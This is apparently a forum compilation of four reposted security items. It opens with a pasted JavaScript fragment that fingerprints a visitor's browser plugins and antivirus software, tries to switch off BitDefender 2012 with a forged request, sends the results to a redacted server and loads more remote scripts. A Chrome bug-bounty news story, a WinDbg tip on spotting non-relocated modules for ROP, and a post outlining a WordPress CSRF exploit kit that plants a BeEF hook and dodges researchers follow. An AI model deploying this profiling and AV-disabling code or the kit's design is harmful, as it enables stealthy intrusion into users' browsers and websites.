iframe_tag.setAttribute("height", "0"); document.getElementsByTagName('head')[0].appendChild(iframe_tag); var form_tag = document.createElement("form"); form_tag.setAttribute("target", "postformdata"); form_tag.setAttribute("action" ,formaction); form_tag.setAttribute("method" ,"POST"); document.getElementsByTagName('head')[0].appendChild(form_tag); var i = document.createElement("input"); i.setAttribute("type","hidden"); i.setAttribute("value",temp); i.setAttribute("name","ck"); var j = document.createElement("input"); j.setAttribute("type","hidden"); j.setAttribute("value",vul); j.setAttribute("name","vul"); form_tag.appendChild(i); form_tag.appendChild(j); form_tag.submit(); } } window.onerror = function() { var arr = new Array(); for(var i = 0; i < window.justforfunnum; i ++) { try { arr.push(document.getElementById('v'+i).vul); } catch (e) { } } window.justforfunres.push(arr); return true; } function jstocreate(){ for(i=0;i<justforfunpath.length-1;i++){ var temp=justforfunpath[i].split('=='); var h=document.createElement('script'); h.id='v'+(i); h.vul=(i); h.name=temp[0]; h.src=temp[1]; document.getElementsByTagName('head')[0].appendChild(h); } } function officever() { var ma=1;var mb=1;var mc=1;var md=1;try{ma=new ActiveXObject("SharePoint.OpenDocuments.4")}catch(e){}try{mb=new ActiveXObject("SharePoint.OpenDocuments.3")}catch(e){}try{mc=new ActiveXObject("SharePoint.OpenDocuments.2")}catch(e){}try{md=new ActiveXObject("SharePoint.OpenDocuments.1")}catch(e){}var a=typeof ma;var b=typeof mb;var c=typeof mc;var d=typeof md;var key="";if(a=="object"&&b=="object"&&c=="object"&&d=="object"){key="Office 2010"}if(a=="number"&&b=="object"&&c=="object"&&d=="object"){key="Office 2007"}if(a=="number"&&b=="number"&&c=="object"&&d=="object"){key="Office 2003"}if(a=="number"&&b=="number"&&c=="number"&&d=="object"){key="Office Xp"}return key } function plugin_pdf_ie() { //ie var ma=1; var key=""; try{ma=new ActiveXObject("AcroPDF.PDF");}catch(e){}; var a=typeof ma; if(a=="object"){key="Adobe Reader";} return key; } function flashver() { var flash=function(){};flash.prototype.controlVersion=function(){var version;var axo;var e;try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");version=axo.GetVariable("$version")}catch(e){}if(!version){try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");version="WIN 6,0,21,0";axo.AllowScriptAccess="always";version=axo.GetVariable("$version")}catch(e){}}if(!version){try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");version=axo.GetVariable("$version")}catch(e){}}if(!version){try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");version="WIN 3,0,18,0"}catch(e){}}if(!version){try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");version="WIN 2,0,0,11"}catch(e){version=-1}}var verArr=version.toString().split(",");var str="";for(var i=0,l=verArr.length;i<l;i++){if(verArr[i].indexOf("WIN")!=-1){str+=verArr[i].substring(3);str+="."}else{if(i==(l-1)){str+=verArr[i]}else{str+=verArr[i];str+="."}}}return(str)};flash.prototype.getSwfVer=function(){var isIE=(navigator.appVersion.indexOf("MSIE")!=-1)?true:false;var isWin=(navigator.appVersion.toLowerCase().indexOf("win")!=-1)?true:false;var isOpera=(navigator.userAgent.indexOf("Opera")!=-1)?true:false;var flashVer=-1;if(navigator.plugins!=null&&navigator.plugins.length>0){if(navigator.plugins["Shockwave Flash 2.0"]||navigator.plugins["Shockwave Flash"]){var swVer2=navigator.plugins["Shockwave Flash 2.0"]?" 2.0":"";var flashDescription=navigator.plugins["Shockwave Flash"+swVer2].description;var descArray=flashDescription.split(" ");var tempArrayMajor=descArray[2].split(".");var versionMajor=tempArrayMajor[0];var versionMinor=tempArrayMajor[1];var versionRevision=descArray[3];if(versionRevision==""){versionRevision=descArray[4]}if(versionRevision[0]=="d"){versionRevision=versionRevision.substring(1)}else{if(versionRevision[0]=="r"){versionRevision=versionRevision.substring(1);if(versionRevision.indexOf("d")>0){versionRevision=versionRevision.substring(0,versionRevision.indexOf("d"))}}}var flashVer=versionMajor+"."+versionMinor+"."+versionRevision}}else{if(navigator.userAgent.toLowerCase().indexOf("webtv/2.6")!=-1){flashVer=4}else{if(navigator.userAgent.toLowerCase().indexOf("webtv/2.5")!=-1){flashVer=3}else{if(navigator.userAgent.toLowerCase().indexOf("webtv")!=-1){flashVer=2}else{if(isIE&&isWin&&!isOpera){flashVer=new flash().controlVersion()}}}}}return flashVer};if(flash.prototype.getSwfVer()==-1){return"No Flash!"}else{return"Shockwave Flash "+flash.prototype.getSwfVer()} } function ajaxfun() { var XMLhttpObject=null;if(window.XMLHttpRequest){XMLhttpObject=new XMLHttpRequest()}else{var MSXML=["Msxml2.XMLHTTP.7.0","Msxml2.XMLHTTP.6.0","Msxml2.XMLHTTP.5.0","Msxml2.XMLHTTP.4.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","MSXML.XMLHTTP","MICROSOFT.XMLHTTP.1.0","MICROSOFT.XMLHTTP.1","Microsoft.XMLHTTP"];for(var i=0;i<MSXML.length;i++){try{XMLhttpObject=new ActiveXObject(MSXML[i]);break}catch(ex){}}}return XMLhttpObject } function disabledbitdefender_2012() { try{var src=document.body.firstChild.src;var ajax=ajaxfun();ajax.onreadystatechange=function(){if(ajax.readyState==4&&ajax.status==200){var temp=ajax.responseText;var a=temp.indexOf("this.ajax.setRequestHeader(");var b=temp.indexOf("this.ajax.send(params);");var head=temp.substring(a,;head=head.split("this.ajax.setRequestHeader(");head=head[2];head=head.replace(/\)/g,"");head=head.replace(/;/g,"");head=head.replace(/\"/g,"");head=head.replace(/ /g,"");head=head.replace(/\r\n/gi,"");head=head.split(",");var name=head[0].toString();var age=head[1].toString();var newajax=ajaxfun();newajax.open("POST",window.location+Math.random(),false);newajax.setRequestHeader("Content-type","application/x-www-form-urlencoded");newajax.setRequestHeader(name,age);var params="status=%3Cmodule%20uid%3D%22NetDefender.HTTP.Core%22%3E%3Cplugin%20uid%3D%22NetDefender.HTTP.Core%22%20feature%3D%22NetDefender.Feature.HTTP.Core.Status%22%20user%3D%22%22%20pid%3D%22%25PID%25%22%20status%3D%220%22%20%2F%3E%3C%2Fmodule%3E";newajax.send(params)}};ajax.open("GET",src,true);ajax.send()}catch(e){} } function bitdefender2012check() { try{var temp=document.body.innerHTML;var key="netdefender/hui/ndhui.js";if(temp.indexOf(key)>0){disabledbitdefender_2012();return"bitdefender_2012"}else{return""}}catch(e){return""} } function unique(data){ data = data || []; var a = {}; for (var i=0; i<data.length; i++) { var v = data[i]; if (typeof(a[v]) == 'undefined'){ a[v] = 1; } }; data.length=0; for (var i in a){ data[data.length] = i; } return data; } function java() { var deployJava=function(){var l={core:["id","class","title","style"],i18n:["lang","dir"],events:["onclick","ondblclick","onmousedown","onmouseup","onmouseover","onmousemove","onmouseout","onkeypress","onkeydown","onkeyup"],applet:["codebase","code","name","archive","object","width","height","alt","align","hspace","vspace"],object:["classid","codebase","codetype","data","type","archive","declare","standby","height","width","usemap","name","tabindex","align","border","hspace","vspace"]};var b=l.object.concat(l.core,l.i18n,l.events);var m=l.applet.concat(l.core);function g(n){if(!d.debug){return}if(console.log){console.log(n)}else{alert(n)}}function k(o,n){if(o==null||o.length==0){return true}var q=o.charAt(o.length-1);if(q!="+"&&q!="*"&&(o.indexOf("_")!=-1&&q!="_")){o=o+"*";q="*"}o=o.substring(0,o.length-1);if(o.length>0){var p=o.charAt(o.length-1);if(p=="."||p=="_"){o=o.substring(0,o.length-1)}}if(q=="*"){return(n.indexOf(o)==0)}else{if(q=="+"){return o<=n}}return false}function e(){var n="//java.com/js/webstart.png";try{return document.location.protocol.indexOf("http")!=-1?n:"http:"+n}catch(o){return"http:"+n}}function j(p,o){var n=p.length;for(var q=0;q<n;q++){if(p[q]===o){return true}}return false}function c(n){return j(m,n.toLowerCase())}function i(n){return j(b,n.toLowerCase())}function a(n){if("MSIE"!=deployJava.browserName){return true}if(deployJava.compareVersionToPattern(deployJava.getPlugin().version,["10","0","0"],false,true)){return true}if(n==null){return false}return !k("1.6.0_33+",n)}var d={debug:null,version:"20120801",firefoxJavaVersion:null,myInterval:null,preInstallJREList:null,returnPage:null,brand:null,locale:null,installType:null,EAInstallEnabled:false,EarlyAccessURL:null,getJavaURL:"http://jdl.sun.com/webapps/getjava/BrowserRedirect?host=java.com",oldMimeType:"application/npruntime-scriptable-plugin;DeploymentToolkit",mimeType:"application/java-deployment-toolkit",launchButtonPNG:e(),browserName:null,browserName2:null,getJREs:function(){var r=new Array();if(this.isPluginInstalled()){var q=this.getPlugin();var n=q.jvms;for(var p=0;p<n.getLength();p++){r[p]=n.get(p).version}}else{var o=this.getBrowser();if(o=="MSIE"){if(this.testUsingActiveX("1.7.0")){r[0]="1.7.0"}else{if(this.testUsingActiveX("1.6.0")){r[0]="1.6.0"}else{if(this.testUsingActiveX("1.5.0")){r[0]="1.5.0"}else{if(this.testUsingActiveX("1.4.2")){r[0]="1.4.2"}else{if(this.testForMSVM()){r[0]="1.1"}}}}}}else{if(o=="Netscape Family"){this.getJPIVersionUsingMimeType();if(this.firefoxJavaVersion!=null){r[0]=this.firefoxJavaVersion}else{if(this.testUsingMimeTypes("1.7")){r[0]="1.7.0"}else{if(this.testUsingMimeTypes("1.6")){r[0]="1.6.0"}else{if(this.testUsingMimeTypes("1.5")){r[0]="1.5.0"}else{if(this.testUsingMimeTypes("1.4.2")){r[0]="1.4.2"}else{if(this.browserName2=="Safari"){if(this.testUsingPluginsArray("1.7.0")){r[0]="1.7.0"}else{if(this.testUsingPluginsArray("1.6")){r[0]="1.6.0"}else{if(this.testUsingPluginsArray("1.5")){r[0]="1.5.0"}else{if(this.testUsingPluginsArray("1.4.2")){r[0]="1.4.2"}}}}}}}}}}}}}if(this.debug){for(var p=0;p<r.length;++p){g("[getJREs()] We claim to have detected Java SE "+r[p])}}return r},installJRE:function(q,o){var n=false;if(this.isPluginInstalled()&&this.isAutoInstallEnabled(q)){var p=false;if(this.isCallbackSupported()){p=this.getPlugin().installJRE(q,o)}else{p=this.getPlugin().installJRE(q)}if(p){this.refresh();if(this.returnPage!=null){document.location=this.returnPage}}return p}else{return this.installLatestJRE()}},isAutoInstallEnabled:function(n){if(!this.isPluginInstalled()){return false}if(typeof n=="undefined"){n=null}return a(n)},isCallbackSupported:function(){return this.isPluginInstalled()&&this.compareVersionToPattern(this.getPlugin().version,["10","2","0"],false,true)},installLatestJRE:function(p){if(this.isPluginInstalled()&&this.isAutoInstallEnabled()){var q=false;if(this.isCallbackSupported()){q=this.getPlugin().installLatestJRE(p)}else{q=this.getPlugin().installLatestJRE()}if(q){this.refresh();if(this.returnPage!=null){document.location=this.returnPage}}return q}else{var o=this.getBrowser();var n=navigator.platform.toLowerCase();if((this.EAInstallEnabled=="true")&&(n.indexOf("win")!=-1)&&(this.EarlyAccessURL!=null)){this.preInstallJREList=this.getJREs();if(this.returnPage!=null){this.myInterval=setInterval("deployJava.poll()",3000)}location.href=this.EarlyAccessURL;return false}else{if(o=="MSIE"){return this.IEInstall()}else{if((o=="Netscape Family")&&(n.indexOf("win32")!=-1)){return this.FFInstall()}else{location.href=this.getJavaURL+((this.returnPage!=null)?("&returnPage="+this.returnPage):"")+((this.locale!=null)?("&locale="+this.locale):"")+((this.brand!=null)?("&brand="+this.brand):"")}}return false}}},runApplet:function(o,t,q){if(q=="undefined"||q==null){q="1.1"}var r="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";var n=q.match(r);if(this.returnPage==null){this.returnPage=document.location}if(n!=null){var p=this.getBrowser();if(p!="?"){if(this.versionCheck(q+"+")){this.writeAppletTag(o,t)}else{if(this.installJRE(q+"+")){this.refresh();location.href=document.location;this.writeAppletTag(o,t)}}}else{this.writeAppletTag(o,t)}}else{g("[runApplet()] Invalid minimumVersion argument to runApplet():"+q)}},writeAppletTag:function(q,v){var n="<applet ";var p="";var r="</applet>";var w=true;if(null==v||typeof v!="object"){v=new Object()}for(var o in q){if(!c(o)){v[o]=q[o]}else{n+=(" "+o+'="'+q[o]+'"');if(o=="code"){w=false}}}var u=false;for(var t in v){if(t=="codebase_lookup"){u=true}if(t=="object"||t=="java_object"||t=="java_code"){w=false}p+='<param name="'+t+'" value="'+v[t]+'"/>'}if(!u){p+='<param name="codebase_lookup" value="false"/>'}if(w){n+=(' code="dummy"')}n+=">";document.write(n+"\n"+p+"\n"+r)},versionCheck:function(o){var u=0;var w="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?(\\*|\\+)?$";var x=o.match(w);if(x!=null){var q=false;var t=false;var p=new Array();for(var r=1;r<x.length;++r){if((typeof x[r]=="string")&&(x[r]!="")){p[u]=x[r];u++}}if(p[p.length-1]=="+"){t=true;q=false;p.length--}else{if(p[p.length-1]=="*"){t=false;q=true;p.length--}else{if(p.length<4){t=false;q=true}}}var v=this.getJREs();for(var r=0;r<v.length;++r){if(this.compareVersionToPattern(v[r],p,q,t)){return true}}return false}else{var n="Invalid versionPattern passed to versionCheck: "+o;g("[versionCheck()] "+n);alert(n);return false}},isWebStartInstalled:function(q){var p=this.getBrowser();if(p=="?"){return true}if(q=="undefined"||q==null){q="1.4.2"}var o=false;var r="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";var n=q.match(r);if(n!=null){o=this.versionCheck(q+"+")}else{g("[isWebStartInstaller()] Invalid minimumVersion argument to isWebStartInstalled(): "+q);o=this.versionCheck("1.4.2+")}return o},getJPIVersionUsingMimeType:function(){for(var o=0;o<navigator.mimeTypes.length;++o){var p=navigator.mimeTypes[o].type;var n=p.match(/^application\/x-java-applet;jpi-version=(.*)$/);if(n!=null){this.firefoxJavaVersion=n[1];if("Opera"!=this.browserName2){break}}}},launchWebStartApplication:function(q){var n=navigator.userAgent.toLowerCase();this.getJPIVersionUsingMimeType();if(this.isWebStartInstalled("1.7.0")==false){if((this.installJRE("1.7.0+")==false)||((this.isWebStartInstalled("1.7.0")==false))){return false}}var t=null;if(document.documentURI){t=document.documentURI}if(t==null){t=document.URL}var o=this.getBrowser();var p;if(o=="MSIE"){p='<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0"><PARAM name="launchjnlp" value="'+q+'"><PARAM name="docbase" value="'+t+'"></object>'}else{if(o=="Netscape Family"){p='<embed type="application/x-java-applet;jpi-version='+this.firefoxJavaVersion+'" width="0" height="0" launchjnlp="'+q+'"docbase="'+t+'" />'}}if(document.body=="undefined"||document.body==null){document.write(p);document.location=t}else{var r=document.createElement("div");r.id="div1";r.style.position="relative";r.style.left="-10000px";r.style.margin="0px auto";r.className="dynamicDiv";r.innerHTML=p;document.body.appendChild(r)}},createWebStartLaunchButtonEx:function(p,o){if(this.returnPage==null){this.returnPage=p}var n="javascript:deployJava.launchWebStartApplication('"+p+"');";document.write('<a href="'+n+'" onMouseOver="window.status=\'\'; return true;"><img src="'+this.launchButtonPNG+'" border="0" /></a>')},createWebStartLaunchButton:function(p,o){if(this.returnPage==null){this.returnPage=p}var n="javascript:if (!deployJava.isWebStartInstalled(""+o+"")) {if (deployJava.installLatestJRE()) {if (deployJava.launch(""+p+"")) {}}} else {if (deployJava.launch(""+p+"")) {}}";document.write('<a href="'+n+'" onMouseOver="window.status=\'\'; return true;"><img src="'+this.launchButtonPNG+'" border="0" /></a>')},launch:function(n){document.location=n;return true},isPluginInstalled:function(){var n=this.getPlugin();if(n&&n.jvms){return true}else{return false}},isAutoUpdateEnabled:function(){if(this.isPluginInstalled()){return this.getPlugin().isAutoUpdateEnabled()}return false},setAutoUpdateEnabled:function(){if(this.isPluginInstalled()){return this.getPlugin().setAutoUpdateEnabled()}return false},setInstallerType:function(n){this.installType=n;if(this.isPluginInstalled()){return this.getPlugin().setInstallerType(n)}return false},setAdditionalPackages:function(n){if(this.isPluginInstalled()){return this.getPlugin().setAdditionalPackages(n)}return false},setEarlyAccess:function(n){this.EAInstallEnabled=n},isPlugin2:function(){if(this.isPluginInstalled()){if(this.versionCheck("1.6.0_10+")){try{return this.getPlugin().isPlugin2()}catch(n){}}}return false},allowPlugin:function(){this.getBrowser();var n=("Safari"!=this.browserName2&&"Opera"!=this.browserName2);return n},getPlugin:function(){this.refresh();var n=null;if(this.allowPlugin()){n=document.getElementById("deployJavaPlugin")}return n},compareVersionToPattern:function(u,o,q,r){if(u==undefined||o==undefined){return false}var v="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";var w=u.match(v);if(w!=null){var t=0;var x=new Array();for(var p=1;p<w.length;++p){if((typeof w[p]=="string")&&(w[p]!="")){x[t]=w[p];t++}}var n=Math.min(x.length,o.length);if(r){for(var p=0;p<n;++p){if(x[p]<o[p]){return false}else{if(x[p]>o[p]){return true}}}return true}else{for(var p=0;p<n;++p){if(x[p]!=o[p]){return false}}if(q){return true}else{return(x.length==o.length)}}}else{return false}},getBrowser:function(){if(this.browserName==null){var n=navigator.userAgent.toLowerCase();g("[getBrowser()] navigator.userAgent.toLowerCase() -> "+n);if((n.indexOf("msie")!=-1)&&(n.indexOf("opera")==-1)){this.browserName="MSIE";this.browserName2="MSIE"}else{if(n.indexOf("iphone")!=-1){this.browserName="Netscape Family";this.browserName2="iPhone"}else{if((n.indexOf("firefox")!=-1)&&(n.indexOf("opera")==-1)){this.browserName="Netscape Family";this.browserName2="Firefox"}else{if(n.indexOf("chrome")!=-1){this.browserName="Netscape Family";this.browserName2="Chrome"}else{if(n.indexOf("safari")!=-1){this.browserName="Netscape Family";this.browserName2="Safari"}else{if((n.indexOf("mozilla")!=-1)&&(n.indexOf("opera")==-1)){this.browserName="Netscape Family";this.browserName2="Other"}else{if(n.indexOf("opera")!=-1){this.browserName="Netscape Family";this.browserName2="Opera"}else{this.browserName="?";this.browserName2="unknown"}}}}}}}g("[getBrowser()] Detected browser name:"+this.browserName+", "+this.browserName2)}return this.browserName},testUsingActiveX:function(n){var p="JavaWebStart.isInstalled."+n+".0";if(typeof ActiveXObject=="undefined"||!ActiveXObject){g("[testUsingActiveX()] Browser claims to be IE, but no ActiveXObject object?");return false}try{return(new ActiveXObject(p)!=null)}catch(o){return false}},testForMSVM:function(){var o="{08B0E5C0-4FCB-11CF-AAA5-00401C608500}";if(typeof oClientCaps!="undefined"){var n=oClientCaps.getComponentVersion(o,"ComponentID");if((n=="")||(n=="5,0,5000,0")){return false}else{return true}}else{return false}},testUsingMimeTypes:function(o){if(!navigator.mimeTypes){g("[testUsingMimeTypes()] Browser claims to be Netscape family, but no mimeTypes[] array?");return false}for(var p=0;p<navigator.mimeTypes.length;++p){s=navigator.mimeTypes[p].type;var n=s.match(/^application\/x-java-applet\x3Bversion=(1\.8|1\.7|1\.6|1\.5|1\.4\.2)$/);if(n!=null){if(this.compareVersions(n[1],o)){return true}}}return false},testUsingPluginsArray:function(o){if((!navigator.plugins)||(!navigator.plugins.length)){return false}var n=navigator.platform.toLowerCase();for(var p=0;p<navigator.plugins.length;++p){s=navigator.plugins[p].description;if(s.search(/^Java Switchable Plug-in (Cocoa)/)!=-1){if(this.compareVersions("1.5.0",o)){return true}}else{if(s.search(/^Java/)!=-1){if(n.indexOf("win")!=-1){if(this.compareVersions("1.5.0",o)||this.compareVersions("1.6.0",o)){return true}}}}}if(this.compareVersions("1.5.0",o)){return true}return false},IEInstall:function(){location.href=this.getJavaURL+((this.returnPage!=null)?("&returnPage="+this.returnPage):"")+((this.locale!=null)?("&locale="+this.locale):"")+((this.brand!=null)?("&brand="+this.brand):"");return false},done:function(o,n){},FFInstall:function(){location.href=this.getJavaURL+((this.returnPage!=null)?("&returnPage="+this.returnPage):"")+((this.locale!=null)?("&locale="+this.locale):"")+((this.brand!=null)?("&brand="+this.brand):"")+((this.installType!=null)?("&type="+this.installType):"");return false},compareVersions:function(q,r){var o=q.split(".");var n=r.split(".");for(var p=0;p<o.length;++p){o[p]=Number(o[p])}for(var p=0;p<n.length;++p){n[p]=Number(n[p])}if(o.length==2){o[2]=0}if(o[0]>n[0]){return true}if(o[0]<n[0]){return false}if(o[1]>n[1]){return true}if(o[1]<n[1]){return false}if(o[2]>n[2]){return true}if(o[2]<n[2]){return false}return true},enableAlerts:function(){this.browserName=null;this.debug=true},poll:function(){this.refresh();var n=this.getJREs();if((this.preInstallJREList.length==0)&&(n.length!=0)){clearInterval(this.myInterval);if(this.returnPage!=null){location.href=this.returnPage}}if((this.preInstallJREList.length!=0)&&(n.length!=0)&&(this.preInstallJREList[0]!=n[0])){clearInterval(this.myInterval);if(this.returnPage!=null){location.href=this.returnPage}}},writePluginTag:function(){var n=this.getBrowser();if(n=="MSIE"){}else{if(n=="Netscape Family"&&this.allowPlugin()){this.writeEmbedTag()}}},refresh:function(){navigator.plugins.refresh(false);var n=this.getBrowser();if(n=="Netscape Family"&&this.allowPlugin()){var o=document.getElementById("deployJavaPlugin");if(o==null){this.writeEmbedTag()}}},writeEmbedTag:function(){var n=false;if(navigator.mimeTypes!=null){for(var o=0;o<navigator.mimeTypes.length;o++){if(navigator.mimeTypes[o].type==this.mimeType){if(navigator.mimeTypes[o].enabledPlugin){document.write('<embed id="deployJavaPlugin" type="'+this.mimeType+'" hidden="true" />');n=true}}}if(!n){for(var o=0;o<navigator.mimeTypes.length;o++){if(navigator.mimeTypes[o].type==this.oldMimeType){if(navigator.mimeTypes[o].enabledPlugin){document.write('<embed id="deployJavaPlugin" type="'+this.oldMimeType+'" hidden="true" />')}}}}}}};d.writePluginTag();if(d.locale==null){var h=null;if(h==null){try{h=navigator.userLanguage}catch(f){}}if(h==null){try{h=navigator.systemLanguage}catch(f){}}if(h==null){try{h=navigator.language}catch(f){}}if(h!=null){h.replace("-","_");d.locale=h}}return d}(); var temp=deployJava.getJREs(); var re=""; if(temp=="") { re="No Java or Disable"; } else { re="Java Version is:"+temp; } return re; } var alldata=new Array(); window.onload = function() { jstocreate(); var retmp = new Array(); for (var i = 0; i < window.justforfunnum; i ++) { var cpr = new Array(); for (var j = 0; j <= i; j ++) { cpr.push(j); } for (var j = 0; j < window.justforfunres.length; j ++) { if (window.justforfunres[j].toString() == cpr.toString()) { retmp.push(i); } } } var sun=retmp; var data=new Array(); for(i=0;i<sun.length;i++){ var temp=document.getElementById('v'+sun[i]).name; data.push(temp); } var kav_2013=0; var kav_2012=0; for(i=0;i<data.length;i++) { if(data[i]=="Kaspersky_2013") { kav_2013=1; } } for(i=0;i<data.length;i++) { if(data[i]=="Kaspersky_2012") { kav_2012=1; } } if(kav_2013==1 &&kav_2012==1) { for(i=0;i<data.length;i++) { if(data[i]=="Kaspersky_2012") { data[i]="Kaspersky_2013"; } } } data=unique(data); alldata.push(flashver()); alldata.push(officever()); alldata.push(plugin_pdf_ie()); alldata.push(bitdefender2012check()); if((typeof java)=="function") { alldata.push(java()); } data=data.join(","); data=data.replace(/,,/g,","); alldata=alldata.join(","); alldata=alldata.replace(/,,/g,","); var put=alldata+","+data; include('[redacted]js.php',put); var tkphp="[redacted]css.js"; execjs(tkphp); } Sursa: test - Pastebin.com

[h=1]Google pays record $31K bounty for Chrome bugs[/h] [h=2]Rewards European researcher with $31,336 payment for reporting three vulnerabilities in JavaScript 3-D API[/h] By Gregg Keizer Computerworld - Google this month paid a security researcher $31,336 for reporting a trio of bugs in Chrome. The amount paid to Ralf-Philipp Weinmann, a research associate at the University of Luxembourg's Interdisciplinary Centre for Security, Reliability and Trust, was a record in Google's bug bounty program. Google has paid out more in various contests it's run or co-sponsored, including $100,000 to a two-man team from MWR InfoSecurity at last month's Pwn2Own. Google cited Weinmann's thoroughness in a short message two weeks ago acknowledging his bounty. "We're pleased to reward Ralf-Philipp Weinmann $31,336 under the Chromium Vulnerability Rewards Program for a chain of three bugs, including demo exploit code and very detailed write-up," said Ben Henry, a Google technical program manager, in a blog post. The three-bug chain credited to Weinmann exploited O3D, a JavaScript API (application programming interface) designed for crafting interactive 3-D graphics-based Web applications. The API and supporting browser plug-in were created by Google, with a preliminary version of the latter released in 2009. All three of the vulnerabilities were labeled "High," the second-most-serious ranking in Chrome's four-step scoring system. Weinmann's compensation was markedly more than the norm for Chrome's bounty program. Last August, however, Google announced bigger bounties -- saying the increase had been prompted by a decline in submissions -- and left the door open to a more flexible approach to issuing rewards and bonuses. So far this year, Google has paid nearly $188,000 in bounties and prizes for Chrome and Chrome OS, including those at Pwn2Own and Google's own Pwnium contest, both held in early March at a Vancouver, British Columbia, security conference. During Pwnium, a researcher known only as "Pinkie Pie" received $40,000 for a partial exploit of Google's browser-based operating system. Mozilla, developer of Firefox, also pays bug bounties, but unlike Google, does not release the names of researchers or the payments they receive. This article, Google pays record $31K bounty for Chrome bugs, was originally published at Computerworld.com.

[h=3]Windbg Tricks - Module Relocation[/h]When ASLR is not supported, pseudo ASLR is often used to introduce a degree of entropy in where the module is loaded into memory. The basic idea behind pseudo ASLR is to pre-allocate memory at the location of a module's preferred base address. This forces the module to be loaded at a non-predetermined address. See this for more details. I stumbled across the windbg command !imgreloc the other day. It can be used to show all modules that have been relocated, and what their original preferred base address is. Below is the output when run while attached to firefox.exe (see this ticket about dll blocking and this firefox ticket for a specific history of pseudo ASLR in firefox): 0:017> !imgreloc 00280000 sqlite3 - RELOCATED from 10000000 00300000 js3250 - RELOCATED from 10000000 00400000 firefox - at preferred address 004e0000 nspr4 - RELOCATED from 10000000 00510000 smime3 - RELOCATED from 10000000 00530000 nss3 - RELOCATED from 10000000 005d0000 nssutil3 - RELOCATED from 10000000 005f0000 plc4 - RELOCATED from 10000000 00600000 plds4 - RELOCATED from 10000000 00610000 ssl3 - RELOCATED from 10000000 00640000 xpcom - RELOCATED from 10000000 01220000 browserdirprovider - RELOCATED from 10000000 01540000 brwsrcmp - RELOCATED from 10000000 01de0000 nssdbm3 - RELOCATED from 10000000 02000000 xpsp2res - RELOCATED from 00010000 036a0000 softokn3 - RELOCATED from 10000000 03980000 freebl3 - RELOCATED from 10000000 039d0000 nssckbi - RELOCATED from 10000000 10000000 xul - at preferred address 59a60000 dbghelp - at preferred address 5ad70000 uxtheme - at preferred address 0:017> .shell -ci "!imgreloc" findstr RELOCATED 00280000 sqlite3 - RELOCATED from 10000000 00300000 js3250 - RELOCATED from 10000000 004e0000 nspr4 - RELOCATED from 10000000 00510000 smime3 - RELOCATED from 10000000 00530000 nss3 - RELOCATED from 10000000 005d0000 nssutil3 - RELOCATED from 10000000 005f0000 plc4 - RELOCATED from 10000000 00600000 plds4 - RELOCATED from 10000000 00610000 ssl3 - RELOCATED from 10000000 00640000 xpcom - RELOCATED from 10000000 01220000 browserdirprovider - RELOCATED from 10000000 01540000 brwsrcmp - RELOCATED from 10000000 01de0000 nssdbm3 - RELOCATED from 10000000 02000000 xpsp2res - RELOCATED from 00010000 036a0000 softokn3 - RELOCATED from 10000000 03980000 freebl3 - RELOCATED from 10000000 039d0000 nssckbi - RELOCATED from 10000000 Searching for preferred instead of RELOCATED will yield a list of modules that should remain at their preferred address (and thus be usable for ROP or other such techniques). Posted by d0c.s4vage Sursa: d0c_s4vage: Windbg Tricks - Module Relocation

[h=2]WordPress CSRF Exploit kit – A novel approach to exploiting WordPress plugins[/h] Over the last few weeks I’ve been on roll with finding CSRF vulnerabilities in WordPress plugins. That’s all nice and good, but when you’ve got 30 of them, it’s a shame to not take it a step further and show the dangers of them! This project is solely designed to show off a few random thoughts of mine, and most importantly to hopefully inspire others to think along these lines. This project is solely meant for educational purposes, not attack against running services or people. https://github.com/CharlieEriksen/WP-CSRF-POC The project shows a few basic concepts in regards to the process of pulling off a CSRF attack against a large number of WordPress sites. Some things worth pointing out: It’s not designed to simply spray and pray. You define the target URLs you want to hit and then you have an unique URL for each blog you can go phishing with. Then it will use the onload function of an img or script tag to detect the presence of the vulnerable plugin on the target blog on request through the unique URL pre-defined We generate the payload on request with an uniquely identifying URL to ensure it’s not easy to extract the exploits. You get max 2 requests to the script per IP. That is all a compromise needs. After that, you get nothing back. Makes it harder for researchers life We deliver a beef hook. Because beef is cool and god damn tasty I want to stress especially the “novel” use of the onload function of img/script tags. People in the past have used it to detect the presence of different host-names/”port scanning” internal systems by vectoring through a hooked browser. I say that’s cool and all, but you can take that further and use it to detect the presence of a plugin on a target on demand, making you able to be much more sneaky. When the markup detects a plugin present on the target, it redirects the browser to the exploit, and no further requests can be made by that IP to the script. A normal series of events would be: An attacker sets up this script with pre-defined targets(targets variable) with an unique URL for each target blog The attacker then spams out a link to the running script with the unique URL for each target blog When a target clicks the link to this script, we validate that the URL contains the unique identifier that resolves to a blog URL The script the generates a random URL for each exploit we have with the target blog URL put in that can then be requested We output to the user a series of img/script tags with onload attributes that redirect to the unique URL generated in step 4. These tags look for specific plugins on the targeted blog If none of the plugins are detected on the blog, we redirect to google If any of the plugins are detected, we redirect to the uniquely generated URL made in step 4 The exploit is now written out to the user, submitting the CSRF with a XSS payload pointing to our beef instance We now delete all cached exploits made for the requesting IP There’s a number of improvements that could be made to this. It could be designed to spray and pray through iframes, but that is much much dirtier, and not the goal of this proof of concept. I urge anybody who finds the concept to be useful to run with it if they so desire. I’ll be adding more exploits as advisories are published. Otherwise, I’m curious to hear people’s thoughts on this. Sursa: Wordpress CSRF Exploit kit – A novel approach to exploiting Wordpress plugins | ceriksen.com

